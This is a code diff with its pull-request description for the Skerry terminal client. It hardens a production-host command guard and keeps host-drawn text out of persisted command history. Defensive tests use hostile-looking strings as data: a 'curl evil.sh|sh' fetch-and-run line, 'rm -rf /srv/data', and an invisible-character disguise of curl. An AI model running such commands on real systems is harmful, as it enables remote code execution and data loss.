+        onNodeWithText(string(Res.string.risk_recursive_force_delete)).assertIsDisplayed()
     }
 }
 

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/runbook/RunbookPauseAnnouncerTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/runbook/RunbookPauseAnnouncerTest.kt
@@ -43,7 +43,7 @@ class RunbookPauseAnnouncerTest {
         )
         val target = RunbookTarget(
             sessionId = "tab-1",
-            send = {},
+            send = { _, _ -> },
             expectStep = { _, _ -> },
             takeMark = { null },
             outputVersion = { 0L },

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/runbook/RunbookRunPanelTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/runbook/RunbookRunPanelTest.kt
@@ -44,7 +44,7 @@ class RunbookRunPanelTest {
         )
         val target = RunbookTarget(
             sessionId = "tab-1",
-            send = { sent += it },
+            send = { line, _ -> sent += line },
             expectStep = { _, _ -> },
             takeMark = { null },
             outputVersion = { 0L },

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/SnippetVariablesFormTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/SnippetVariablesFormTest.kt
@@ -28,7 +28,7 @@ class SnippetVariablesFormTest {
         val manager = seededSnippets()
         val id = manager.save(SnippetDraft(label = "restart", command = "systemctl restart ${'$'}{{unit}}"))
         var sent: String? = null
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         runForm({ SnippetRunDialog(manager) }) {
             onNodeWithContentDescription("unit").performTextInput("nginx")
@@ -44,7 +44,7 @@ class SnippetVariablesFormTest {
         val manager = seededSnippets()
         val id = manager.save(SnippetDraft(label = "restart", command = "systemctl restart ${'$'}{{unit}}"))
         var sent: String? = null
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         runForm({ SnippetRunDialog(manager) }) {
             onNodeWithContentDescription("unit").performTextInput("nginx")
@@ -63,7 +63,7 @@ class SnippetVariablesFormTest {
         val manager = seededSnippets()
         val id = manager.save(SnippetDraft(label = "restart", command = "systemctl restart ${'$'}{{unit}}"))
         var sent: String? = null
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         runForm({ SnippetRunDialog(manager) }) {
             onNodeWithTag(UiTags.FORM_SAVE).performClick()
@@ -80,7 +80,7 @@ class SnippetVariablesFormTest {
             SnippetDraft(label = "tail", command = "tail -n ${'$'}{{lines}} /var/log/${'$'}{{file}}"),
         )
         var sent: String? = null
-        manager.run(id) { sent = it }
+        manager.run(id) { line, _ -> sent = line }
 
         runForm({ SnippetRunDialog(manager) }) {
             onNodeWithContentDescription("lines").performTextInput("50")

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/terminal/ProductionGuardHoldThreadingTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/terminal/ProductionGuardHoldThreadingTest.kt
@@ -1,5 +1,6 @@
 package app.skerry.ui.terminal
 
+import app.skerry.shared.guard.ProductionGuard
 import app.skerry.shared.guard.ProductionGuardPolicy
 import java.util.Collections
 import java.util.concurrent.CountDownLatch
@@ -29,7 +30,7 @@ class ProductionGuardHoldThreadingTest {
 
             fun holder(command: String) = thread(start = false) {
                 start.await()
-                hold.hold("$command\n", HeldInputSource.Paste, quote = { command }) { listOf(command) }
+                hold.hold("$command\n", HeldInputSource.Paste, quote = { command }) { policy -> ProductionGuard.inspect(listOf(command), policy) }
             }.apply {
                 setUncaughtExceptionHandler { _, t -> failures += t }
                 start()

--- a/shared/src/commonMain/kotlin/app/skerry/shared/ai/CommandRisk.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/ai/CommandRisk.kt
@@ -22,6 +22,13 @@ enum class CommandRiskReason {
     RecursivePermissions,
     SecurityFileOverwrite,
     FirewallFlush,
+    /**
+     * Not a rule's finding: the input exceeds what the production guard's classifier reads
+     * ([app.skerry.shared.guard.MAX_GUARDED_CANDIDATES] lines /
+     * [app.skerry.shared.guard.MAX_GUARDED_COMMAND_LENGTH] chars of a line), so part of it was
+     * never classified at all — which on a production host is itself the thing to confirm.
+     */
+    BeyondInspection,
 
     // Warn
     DeletesFiles,

--- a/shared/src/commonMain/kotlin/app/skerry/shared/guard/ProductionGuard.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/guard/ProductionGuard.kt
@@ -7,6 +7,13 @@ import app.skerry.shared.ai.CommandRiskReason
 import app.skerry.shared.tag.PROD_TAG
 
 /**
+ * One candidate for the classifier: the text it may read — already cut to
+ * [MAX_GUARDED_COMMAND_LENGTH] — and how long the line really is. Carried separately because the
+ * dialog states the length, and measuring after the cut called a 900-character line "512 chars".
+ */
+data class GuardCandidate(val command: String, val fullLength: Int)
+
+/**
  * Longest command text the guard inspects. A candidate can come from a screen row, which may hold
  * program output rather than a command; truncating keeps a pathological line out of the regex
  * engine. Long enough for any realistic one-liner.
@@ -103,19 +110,78 @@ object ProductionGuard {
      * Ties go to the shortest candidate: the same command shows up with and without its prompt
      * prefix, and the dialog should quote what was run, not `root@host:~# …`.
      */
-    fun inspect(candidates: List<String>, policy: ProductionGuardPolicy): GuardedCommand? {
+    fun inspect(candidates: List<String>, policy: ProductionGuardPolicy): GuardedCommand? =
+        inspectCandidates(
+            candidates.map { candidate ->
+                val whole = candidate.trim()
+                GuardCandidate(whole.take(MAX_GUARDED_COMMAND_LENGTH), fullLength = whole.length)
+            },
+            policy,
+        )
+
+    /**
+     * [inspect] for candidates that already know their uncut length — what [candidatesOf] returns.
+     * A separate name, not an overload: both take a `List`, and the JVM cannot tell the two apart.
+     */
+    fun inspectCandidates(candidates: List<GuardCandidate>, policy: ProductionGuardPolicy): GuardedCommand? {
         if (!policy.production) return null
         var worst: GuardedCommand? = null
         for (candidate in candidates.take(MAX_GUARDED_CANDIDATES)) {
-            val whole = candidate.trim()
-            val command = whole.take(MAX_GUARDED_COMMAND_LENGTH)
+            val command = candidate.command
             if (command.isEmpty()) continue
             val assessment = CommandRiskClassifier.assess(command)
             if (!needsConfirmation(assessment, policy)) continue
-            worst = worse(worst, GuardedCommand(command, assessment, fullLength = whole.length))
+            worst = worse(worst, GuardedCommand(command, assessment, fullLength = candidate.fullLength))
         }
         return worst
     }
+
+    /**
+     * The finding for input the classifier could not fully read: the first non-blank line past the
+     * candidate cap ([MAX_GUARDED_CANDIDATES]), or the first line longer than what is classified
+     * ([MAX_GUARDED_COMMAND_LENGTH]). On a production host, exceeding what the classifier reads is
+     * itself worth a question — text past the caps used to run with no dialog at all. Consulted only
+     * when no rule found a reason ([ProductionGuardHold]): a real finding explains more than "part
+     * of this was not read", and one confirmation is asked either way.
+     *
+     * The command is the offending line as far as a dialog may quote it; the assessment carries no
+     * rule's reason, because no rule ever saw the text — which is exactly what the user is asked
+     * about.
+     */
+    fun overflow(text: String, policy: ProductionGuardPolicy): GuardedCommand? {
+        if (!policy.production) return null
+        var index = 0
+        for (line in text.lineSequence()) {
+            index++
+            val trimmed = line.trim()
+            if (trimmed.isEmpty()) {
+                // The scan is bounded, not only the finding: a run of blank lines would otherwise
+                // turn this into a second full pass over a multi-megabyte paste on the caller's
+                // thread. Past the bound the tail is unread by definition — the very thing this
+                // asks about — so it errs toward asking, with nothing to quote.
+                if (index > MAX_OVERFLOW_SCAN) return GuardedCommand("", BEYOND_INSPECTION, fullLength = 0)
+                continue
+            }
+            if (index > MAX_GUARDED_CANDIDATES || trimmed.length > MAX_GUARDED_COMMAND_LENGTH) {
+                return GuardedCommand(
+                    trimmed.take(MAX_GUARDED_COMMAND_LENGTH),
+                    BEYOND_INSPECTION,
+                    fullLength = trimmed.length,
+                )
+            }
+        }
+        return null
+    }
+
+    /** How far [overflow] reads before giving up on finding a non-blank line to quote. */
+    private const val MAX_OVERFLOW_SCAN = MAX_GUARDED_CANDIDATES * 2
+
+    /**
+     * Danger, because a block nobody could read is confirmed whatever the settings say —
+     * [needsConfirmation] never sees it, so the level must clear every bar on its own.
+     */
+    private val BEYOND_INSPECTION =
+        CommandAssessment(CommandRisk.Danger, CommandRiskReason.BeyondInspection)
 
     /**
      * The riskier of two findings by the same rule [inspect] ranks its candidates with. Public
@@ -137,16 +203,20 @@ object ProductionGuard {
     /**
      * Candidates from one input block (a paste, an IME commit, a ready-made command). Capped in
      * number while splitting rather than after — a multi-megabyte paste would otherwise materialize
-     * a String per line before [inspect] ever gets to drop them. Capped in length here as well: a
-     * paste is not bounded by anything, and holding it a second time in full to keep an exact
-     * [GuardedCommand.fullLength] for a line nobody quotes from is the wrong trade. The quote carries
-     * its own, uncut length; what the screen holds is bounded by the terminal and stays uncut in
-     * [promptCandidates], which is where a length past the cap can still be real.
+     * a String per line before [inspectCandidates] ever gets to drop them. Capped in length here as
+     * well: a paste is not bounded by anything, and holding it a second time in full to keep the
+     * text past the cut for a line nobody quotes from is the wrong trade. What survives the cut is
+     * the line's real length, carried in [GuardCandidate.fullLength] so the dialog's count is not an
+     * invention; what the screen holds is bounded by the terminal and stays uncut in
+     * [promptCandidates].
      */
-    fun candidatesOf(text: String): List<String> =
+    fun candidatesOf(text: String): List<GuardCandidate> =
         text.lineSequence()
             .take(MAX_GUARDED_CANDIDATES)
-            .map { it.take(MAX_GUARDED_COMMAND_LENGTH) }
+            .map { line ->
+                val whole = line.trim()
+                GuardCandidate(whole.take(MAX_GUARDED_COMMAND_LENGTH), fullLength = whole.length)
+            }
             .toList()
 
     /**

--- a/shared/src/commonMain/kotlin/app/skerry/shared/terminal/AutocompleteEngine.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/terminal/AutocompleteEngine.kt
@@ -325,10 +325,14 @@ class AutocompleteEngine(
          * Ctrl-Y (yank), Ctrl-_ (undo). Ctrl-A/Ctrl-B/Ctrl-E/Ctrl-F leave the content alone and move the cursor,
          * which is worse for the same reason: what is typed next lands where the cursor is, not at
          * the end, so a line built by appending is one the shell does not have — and the production
-         * guard would quote it. The cost is wider than an edited line: Ctrl-A is also the tmux and
-         * screen prefix, and it reaches the PTY like any other Ctrl byte, so a window switch costs
-         * the next command its ghost and its history entry until the line is run or cleared. The
-         * alternative is a confirmation that names a command nobody wrote.
+         * guard would quote it. The cost is wider than an edited line: Ctrl-A and Ctrl-B double as
+         * the screen and tmux prefixes and reach the PTY like any other Ctrl byte, so a window
+         * switch costs the next command its ghost and its history entry until the line is run or
+         * cleared. Exempting the motions on an EMPTY line was tried for exactly that case and
+         * reverted (issue #246 review): a prefix is never pressed alone, and the command key after
+         * it — swallowed by the multiplexer, never seen by the shell — landed in the tracked line
+         * as content, so the next commit read `cuptime`, a command nobody ran, persisted and
+         * offered back. Losing an entry is the safe direction; fabricating one is not.
          *
          * Ctrl-U and Ctrl-C clear the line outright and are handled above; Ctrl-L only redraws.
          */

--- a/shared/src/commonMain/kotlin/app/skerry/shared/terminal/CommandHistory.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/terminal/CommandHistory.kt
@@ -17,35 +17,70 @@ import kotlin.concurrent.Volatile
 class CommandHistory(private val capacity: Int = 500) {
 
     /**
-     * The entries, newest first, as a value that is replaced rather than edited.
+     * Entries (newest first) and the session-only marks, replaced together as ONE value.
      *
      * A terminal reads its history from the coroutine that owns the emulator — every published
-     * screen refreshes the ghost suggestion — while the line that produced an entry is recorded from
-     * the thread the user typed on. A list being iterated while another thread adds to it is a
-     * `ConcurrentModificationException` on the reader, and the reader is a loop with nothing to
-     * catch it: the session would stop drawing while still looking connected. Replacing the value
-     * costs a copy per command entered, which is once per Enter.
+     * screen refreshes the ghost suggestion — while the line that produced an entry is recorded
+     * from the thread the user typed on. A list being iterated while another thread adds to it is
+     * a `ConcurrentModificationException` on the reader; two separately-volatile fields were the
+     * subtler failure: a reader pairing a stale entries snapshot with fresher marks saw a
+     * host-authored entry unmarked and persisted it. One immutable holder makes the pair atomic —
+     * two writers can still lose an update to each other, but no reader can ever see entries and
+     * marks from different moments. Replacing the value costs a copy per command entered, which is
+     * once per Enter.
      */
+    private class State(val entries: List<String>, val sessionOnly: Set<String>)
+
     @Volatile
-    private var entries: List<String> = emptyList() // index 0 is the most recent
+    private var state = State(emptyList(), emptySet())
 
     /** Snapshot of history, newest first. */
-    val commands: List<String> get() = entries
+    val commands: List<String> get() = state.entries
+
+    /**
+     * The entries a store may persist: what the user typed, without the commands recorded off the
+     * screen. A completion the host drew serves the ghost and reverse search in THIS session, but
+     * persisting it would carry host-authored text into the cross-host command palette — which
+     * offers it back while the user is connected somewhere else.
+     */
+    val persistedCommands: List<String>
+        get() {
+            val current = state
+            if (current.sessionOnly.isEmpty()) return current.entries
+            return current.entries.filterNot { it in current.sessionOnly }
+        }
 
     /** Fills history from a ready-made list (e.g. loaded from a store); order is newest first. */
     fun preload(history: List<String>) {
-        entries = emptyList()
+        state = State(emptyList(), emptySet())
         history.asReversed().forEach { record(it) }
     }
 
     /**
      * Records an executed [command]. Empty/blank input is ignored; an existing entry is moved to
-     * the top (no duplicates), otherwise it's prepended. The tail beyond [capacity] is dropped.
+     * the top (no duplicates), otherwise it's prepended. The tail beyond [capacity] is dropped,
+     * and its session-only marks with it — a mark whose entry aged out would otherwise pin its
+     * string for the life of the session.
+     *
+     * [sessionOnly] keeps the entry out of [persistedCommands] — for a command completed by the
+     * host on its own screen row. Recording the same text again as the user's own lifts the mark:
+     * a command actually typed end to end is the user's to keep. The reverse never happens: a
+     * session-only record for text that is already the user's own entry leaves it the user's —
+     * otherwise the host, by drawing a completion equal to a stored command, could demote it and
+     * have the next save silently erase its persisted copy.
      */
-    fun record(command: String) {
+    fun record(command: String, sessionOnly: Boolean = false) {
         val trimmed = command.trim()
         if (trimmed.isEmpty()) return
-        entries = (listOf(trimmed) + entries.filterNot { it == trimmed }).take(capacity)
+        val current = state
+        val updated = listOf(trimmed) + current.entries.filterNot { it == trimmed }
+        var marks = when {
+            !sessionOnly -> current.sessionOnly - trimmed
+            trimmed in current.entries && trimmed !in current.sessionOnly -> current.sessionOnly
+            else -> current.sessionOnly + trimmed
+        }
+        if (updated.size > capacity) marks = marks - updated.drop(capacity).toSet()
+        state = State(updated.take(capacity), marks)
     }
 
     /**
@@ -60,7 +95,7 @@ class CommandHistory(private val capacity: Int = 500) {
      */
     fun matches(prefix: String): List<String> {
         if (prefix.isBlank()) return emptyList()
-        return entries.filter { it.length > prefix.length && it.startsWith(prefix) }
+        return state.entries.filter { it.length > prefix.length && it.startsWith(prefix) }
     }
 
     /**
@@ -69,18 +104,18 @@ class CommandHistory(private val capacity: Int = 500) {
      */
     fun search(query: String): List<String> {
         if (query.isBlank()) return emptyList()
-        return entries.filter { it.contains(query) }
+        return state.entries.filter { it.contains(query) }
     }
 
     /** Forgets [command] (e.g. a typo that produced "command not found"). `true` if it was present. */
     fun forget(command: String): Boolean {
         val trimmed = command.trim()
-        // One read for what is kept and for what it is compared against: taking the entries again
-        // would answer about a list this call never looked at, and then overwrite it.
-        val current = entries
-        val kept = current.filterNot { it == trimmed }
-        if (kept.size == current.size) return false
-        entries = kept
+        // One read for what is kept and for what it is compared against: taking the state again
+        // would answer about a value this call never looked at, and then overwrite it.
+        val current = state
+        val kept = current.entries.filterNot { it == trimmed }
+        if (kept.size == current.entries.size) return false
+        state = State(kept, current.sessionOnly - trimmed)
         return true
     }
 }

--- a/shared/src/commonTest/kotlin/app/skerry/shared/guard/ProductionGuardTest.kt
+++ b/shared/src/commonTest/kotlin/app/skerry/shared/guard/ProductionGuardTest.kt
@@ -1,6 +1,7 @@
 package app.skerry.shared.guard
 
 import app.skerry.shared.ai.CommandRisk
+import app.skerry.shared.ai.CommandRiskReason
 import app.skerry.shared.tag.PROD_TAG
 import kotlin.test.Test
 import kotlin.test.assertEquals
@@ -140,19 +141,61 @@ class ProductionGuardTest {
         assertEquals(MAX_GUARDED_CANDIDATES, ProductionGuard.candidatesOf(text).size)
         // And in length, so a two-line paste of a log file is not held in memory twice over.
         val longLine = "x".repeat(MAX_GUARDED_COMMAND_LENGTH + 500)
-        assertTrue(ProductionGuard.candidatesOf(longLine).all { it.length <= MAX_GUARDED_COMMAND_LENGTH })
+        val cut = ProductionGuard.candidatesOf(longLine)
+        assertTrue(cut.all { it.command.length <= MAX_GUARDED_COMMAND_LENGTH })
+        // The cut candidate still knows the real length, so a dialog's count is not the cut's.
+        assertEquals(longLine.length, cut.single().fullLength)
     }
 
     @Test
     fun splitting_handles_every_line_ending() {
-        assertEquals(listOf("a", "b", "c"), ProductionGuard.candidatesOf("a\nb\rc"))
-        assertEquals(listOf("a", "b"), ProductionGuard.candidatesOf("a\r\nb"))
+        assertEquals(listOf("a", "b", "c"), ProductionGuard.candidatesOf("a\nb\rc").map { it.command })
+        assertEquals(listOf("a", "b"), ProductionGuard.candidatesOf("a\r\nb").map { it.command })
     }
 
     @Test
     fun a_command_split_out_of_a_block_is_still_classified() {
         // The risky line can sit anywhere in a pasted block, not only on the first line.
-        val guarded = ProductionGuard.inspect(ProductionGuard.candidatesOf("cd /srv\nrm -rf /srv/data\n"), GUARDING)
+        val guarded = ProductionGuard.inspectCandidates(ProductionGuard.candidatesOf("cd /srv\nrm -rf /srv/data\n"), GUARDING)
         assertEquals("rm -rf /srv/data", guarded?.command)
+    }
+
+    @Test
+    fun overflow_flags_a_line_past_the_candidate_cap() {
+        // A payload on line 201 of a block was never classified — that fact alone is the finding.
+        val text = (0..MAX_GUARDED_CANDIDATES).joinToString("\n") { "echo $it" }
+        val over = assertNotNull(ProductionGuard.overflow(text, GUARDING))
+        assertEquals(CommandRiskReason.BeyondInspection, over.assessment.reason)
+        assertEquals(CommandRisk.Danger, over.assessment.risk)
+    }
+
+    @Test
+    fun overflow_flags_a_line_longer_than_the_classifier_reads() {
+        val line = "x".repeat(MAX_GUARDED_COMMAND_LENGTH + 100)
+        val over = assertNotNull(ProductionGuard.overflow(line, GUARDING))
+        assertEquals(MAX_GUARDED_COMMAND_LENGTH, over.command.length)
+        assertEquals(line.length, over.fullLength)
+    }
+
+    @Test
+    fun overflow_passes_a_block_inside_both_caps() {
+        assertNull(ProductionGuard.overflow("echo one\necho two", GUARDING))
+        // Blank lines past the cap run nothing and raise nothing.
+        assertNull(ProductionGuard.overflow("echo one" + "\n".repeat(MAX_GUARDED_CANDIDATES + 50), GUARDING))
+    }
+
+    @Test
+    fun overflow_bounds_its_scan_over_blank_runs() {
+        // A run of blank lines must not turn the scan into a second full pass over a huge paste:
+        // past the bound the tail is unread by definition, so the answer errs toward asking.
+        val text = "echo one" + "\n".repeat(MAX_GUARDED_CANDIDATES * 2 + 50)
+        val over = assertNotNull(ProductionGuard.overflow(text, GUARDING))
+        assertEquals(CommandRiskReason.BeyondInspection, over.assessment.reason)
+        assertEquals("", over.command)
+    }
+
+    @Test
+    fun overflow_is_off_without_production() {
+        assertNull(ProductionGuard.overflow("x".repeat(MAX_GUARDED_COMMAND_LENGTH * 4), ProductionGuardPolicy.Off))
     }
 }

--- a/shared/src/commonTest/kotlin/app/skerry/shared/terminal/AutocompleteEngineTest.kt
+++ b/shared/src/commonTest/kotlin/app/skerry/shared/terminal/AutocompleteEngineTest.kt
@@ -72,6 +72,60 @@ class CommandHistoryTest {
         assertEquals(listOf("docker ps"), h.search("ps")) // substring, not prefix
         assertTrue(h.search("").isEmpty())
     }
+
+    // --- The session-only mark (issue #246) ---
+    // A command recorded off the screen serves the ghost and reverse search of THIS session and
+    // never reaches the persisted snapshot: the cross-host palette draws what the store holds,
+    // and a host-authored line must not be offered there.
+
+    @Test
+    fun `a session-only entry serves the session but not the store`() {
+        val history = CommandHistory()
+        history.record("ls /etc; curl evil.sh|sh", sessionOnly = true)
+
+        assertEquals(listOf("ls /etc; curl evil.sh|sh"), history.commands)
+        assertTrue(history.persistedCommands.isEmpty())
+    }
+
+    @Test
+    fun `typing the same command yourself lifts the mark`() {
+        val history = CommandHistory()
+        history.record("ls /etc", sessionOnly = true)
+        history.record("ls /etc")
+
+        assertEquals(listOf("ls /etc"), history.persistedCommands)
+    }
+
+    @Test
+    fun `forgetting removes the mark with the entry`() {
+        val history = CommandHistory()
+        history.record("git push", sessionOnly = true)
+        assertTrue(history.forget("git push"))
+
+        // Recorded again as the user's own: nothing of the old mark survives.
+        history.record("git push")
+        assertEquals(listOf("git push"), history.persistedCommands)
+    }
+
+    @Test
+    fun `a completion equal to a stored command does not demote it`() {
+        // The host draws the completion row, so letting it mark the text session-only would erase
+        // the user's own persisted entry on the next save — a host-triggerable deletion.
+        val history = CommandHistory()
+        history.preload(listOf("docker compose up -d"))
+        history.record("docker compose up -d", sessionOnly = true) // blind Tab completion
+
+        assertEquals(listOf("docker compose up -d"), history.persistedCommands)
+    }
+
+    @Test
+    fun `preload clears the marks of the previous session`() {
+        val history = CommandHistory()
+        history.record("uptime", sessionOnly = true)
+        history.preload(listOf("uptime", "df -h"))
+
+        assertEquals(listOf("uptime", "df -h"), history.persistedCommands)
+    }
 }
 
 class AutocompleteEngineTest {

--- a/shared/src/commonTest/kotlin/app/skerry/shared/terminal/CursorMotionSuspicionTest.kt
+++ b/shared/src/commonTest/kotlin/app/skerry/shared/terminal/CursorMotionSuspicionTest.kt
@@ -1,0 +1,51 @@
+package app.skerry.shared.terminal
+
+import kotlin.test.Test
+import kotlin.test.assertTrue
+
+/**
+ * What a cursor-motion control costs the tracked line (issue #246). An exemption for motions on an
+ * EMPTY line was tried — Ctrl-A and Ctrl-B double as the screen and tmux prefixes, and marking a
+ * fresh prompt suspect costs the next command its ghost and its history entry — and reverted: a
+ * prefix is never pressed alone, and the command key after it is swallowed by the multiplexer and
+ * never reaches the shell. With the exemption that key landed in the tracked line as content, so
+ * the next commit read `cuptime`, a command nobody ran, persisted, offered back as a ghost, and
+ * quoted by the production guard as what would run. Losing an entry is the safe direction;
+ * fabricating one is not. These tests pin that decision.
+ */
+class CursorMotionSuspicionTest {
+
+    @Test
+    fun `a cursor motion on an empty line is suspect — the byte may be a multiplexer prefix`() {
+        val e = AutocompleteEngine()
+        e.onUserInput(byteArrayOf(2)) // Ctrl-B: tmux's default prefix, sent on a fresh prompt
+
+        assertTrue(e.lineSuspect)
+
+        // The window-switch key tmux swallowed must not become part of the next command.
+        e.onUserInput("c".encodeToByteArray())
+        e.onUserInput("uptime\r".encodeToByteArray())
+        assertTrue(
+            e.commandHistory.commands.isEmpty(),
+            "a fabricated command reached history: ${e.commandHistory.commands}",
+        )
+    }
+
+    @Test
+    fun `a cursor motion inside a typed line makes it a guess`() {
+        val e = AutocompleteEngine()
+        e.onUserInput("deploy".encodeToByteArray())
+        e.onUserInput(byteArrayOf(5)) // Ctrl-E: to the end of the line
+
+        assertTrue(e.lineSuspect)
+    }
+
+    @Test
+    fun `an edit control on an empty line is suspect too`() {
+        // Ctrl-Y yanks the kill ring: the host's line grows while the tracked one stays empty.
+        val e = AutocompleteEngine()
+        e.onUserInput(byteArrayOf(25))
+
+        assertTrue(e.lineSuspect)
+    }
+}

--- a/shared/src/desktopTest/kotlin/app/skerry/shared/terminal/CommandHistoryThreadingTest.kt
+++ b/shared/src/desktopTest/kotlin/app/skerry/shared/terminal/CommandHistoryThreadingTest.kt
@@ -1,0 +1,41 @@
+package app.skerry.shared.terminal
+
+import java.util.concurrent.atomic.AtomicBoolean
+import kotlin.concurrent.thread
+import kotlin.test.Test
+import kotlin.test.assertNull
+
+/**
+ * The atomicity [CommandHistory] promises: entries and their session-only marks are one value, so
+ * no reader can pair a stale entries snapshot with fresher marks and see a host-authored entry
+ * unmarked — the window that let host-drawn text into a persisted snapshot. Two separately-volatile
+ * fields failed this hammer at higher iteration counts whatever the write order; the single holder
+ * makes the invariant absolute, and this test can never fail against correct code.
+ */
+class CommandHistoryThreadingTest {
+
+    @Test
+    fun `a session-only entry is never observable unmarked`() {
+        val history = CommandHistory()
+        history.preload(listOf("df -h"))
+        val stop = AtomicBoolean(false)
+        var leaked: List<String>? = null
+        val reader = thread {
+            while (!stop.get()) {
+                val persisted = history.persistedCommands
+                if ("ls /etc; curl evil" in persisted) {
+                    leaked = persisted
+                    stop.set(true)
+                }
+            }
+        }
+        repeat(100_000) {
+            if (stop.get()) return@repeat
+            history.record("ls /etc; curl evil", sessionOnly = true)
+            history.forget("ls /etc; curl evil")
+        }
+        stop.set(true)
+        reader.join()
+        assertNull(leaked, "a host-authored entry was readable as persistable: $leaked")
+    }
+}


### PR DESCRIPTION
Closes #246.

The production guard's confirmation dialogs get honest about what they show, and the history around them stops carrying text nobody typed.

## What changed

**Alternate screen and history.** Input typed, pasted or sent into a fullscreen TUI (vim, htop) no longer feeds the autocomplete engine: an Enter in insert mode commits a line of a *file*, and it used to land in vault-backed history — from where a token in an edited config surfaced as a ghost suggestion and in the cross-host command palette. The tracked line resets on both alt-screen crossings. Deliberate trade-off: the client cannot tell tmux (which keeps the whole attach on the alternate screen) from vim, so commands typed at a shell prompt *inside tmux* no longer reach persisted history either; ghost suggestions and reverse search were already inactive there.

**The screen line, read whole.** The guard now reads the whole logical shell line — joined across soft-wrapped rows (capped at 64 rows per direction; `screen` includes scrollback) and measured in cells, so wide CJK glyphs count as the columns they occupy. A line recalled from history with the cursor stepped back inside it is classified whole (the risky tail right of the cursor used to run unexamined), a wrapped line whose head sits above the cursor row is classified whole (it used to run with no dialog at all), and when the line continues past the cursor the dialog says "shown in part" with no invented count.

**The classifier's caps.** Input the classifier could not fully read — a payload on line 201 of a block, past character 512 of a line, or a screen line whose risk sits beyond the 512-character window — used to run with no dialog. On a production host it is now held with its own reason ("Exceeds what the guard reads — part of this input was not classified", en/ru/zh). A rule's finding outranks this fallback: when a real risk was read, that is what the dialog explains. The overflow scan is bounded, so a multi-megabyte paste is not walked twice.

**Honest lengths.** A candidate cut to 512 characters for the classifier carries its real length, so the aside under the quote reads "shown in part · 900 chars" instead of claiming the cut is the line. Counts beside masked text follow the mask: a fully drawn masked quote or aside never claims a hidden tail, and a masked line that was also cut publishes no count at all rather than a number about text the dialog does not draw.

**Completions and the palette.** A command the shell finished on its own row (blind Tab completion) still serves this session's ghost and reverse search, but is no longer persisted: the stored copy used to surface in the cross-host palette as a command nobody ran. A completion equal to a command the user already stored does not demote it — otherwise the host could erase persisted entries by drawing matching completions. Entries and their session-only marks live in one atomic holder, so a concurrent reader can never observe a host-authored entry unmarked (a stress test pins this).

**Vault secrets in confirmations.** `sendUserInputGuarded` now skips the hold while a secret prompt is active (matching the typed path — parking the answer in a dialog would print it), and resolved `${{vault:…}}` values are masked in everything the guard's dialog draws: the quote, the aside, and the connect-time snippet gate. Masking is display-only — classification and the replayed bytes stay the real text, the connect-gate's risk reason is computed over the real line, secrets are masked longest-first so one secret embedded in another cannot expose its flanks, and a string cut mid-secret masks the trailing prefix too.

**Escape predicate.** `CommandQuote`'s draws-as-itself predicate is now category-based for the basic plane (the whole of CONTROL, FORMAT and the separators — the next Unicode addition is covered by default), and the astral block list covers every astral Cf block of Unicode 15, not just the tag block: `curl\u{1D173}evil.sh` no longer draws as two words while running as one.

**Structure.** The terminal-specific half of the guard (candidates, quoting, screen reads, sent-text tracking) moved out of `TerminalScreenState` into `TerminalCommandGuard`, next to `ProductionGuardHold`.

## Evaluated and not shipped

The issue suggested exempting cursor-motion controls (Ctrl-A/B/E/F) from line suspicion on an empty line, so a tmux/screen prefix would not cost the next command its ghost and history entry. Implemented, then reverted on review: a prefix is never pressed alone, and the command key after it — swallowed by the multiplexer, never seen by the shell — landed in the tracked line as content. The next commit read `cuptime`, a command nobody ran, persisted, offered back as a ghost, and quoted by the guard as what would run. Losing an entry is the safe direction; fabricating one is not. A test pins the decision.

## Known limits

- Inside tmux (alternate screen), typed commands are not persisted to history — see above.
- The alt-screen boundary reset of the tracked line is best-effort against a keystroke racing the snapshot publish; the engine's fields lose but never tear, and the next Enter or Ctrl-U clears the residue.
- A drawn line that *begins* mid-secret (reachable only through a soft-wrapped row carrying a resolved value) is not masked: a leading-suffix rule cannot tell a secret's tail from ordinary text. Documented in `maskSecrets`.
- Output printed without a trailing newline wraps into the prompt's logical line; if that joined line exceeds what the classifier reads, Enter on a production host asks a "beyond inspection" question until the chain scrolls away — a false positive accepted over the silent miss.
- When the tracked line is suspect and not a prefix, the shell-line prefix is neither quoted nor drawn — documented design carried over unchanged.

## Tests

New behavioural tests reproduce each bug before its fix (recorded failing first): `ConfirmationTailsTest` (alt screen × history × tracking, cursor/wrap/wide-glyph counts, caps and the screen-overflow net, secret prompt, masking round-trip, palette exclusion), `CommandQuoteEscapeTest` (astral Cf), `CursorMotionSuspicionTest` (the reverted exemption, pinned), `MaskSecretsTest`, `RunbookSecretsTest`, `CommandHistoryThreadingTest` (atomicity under a concurrent reader), plus additions to `ProductionGuardTest`, `ProductionGuardHoldTest`, `CommandHistoryTest`, `SnippetManagerTest`, `TerminalScreenStateTest`, `ProdGuardDialogNameTest` and `CommandQuoteTest` (live-region announcement of the uncounted notice).

## Verification

- Full test suites, `./gradlew build` (lint), detekt (no new findings, no re-baselining) and `:androidApp:compileDebugKotlin` are green.
- Not verified live: the dialogs on a real production-tagged host, Android on a device, and the tmux/vim history behaviour against a live server.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
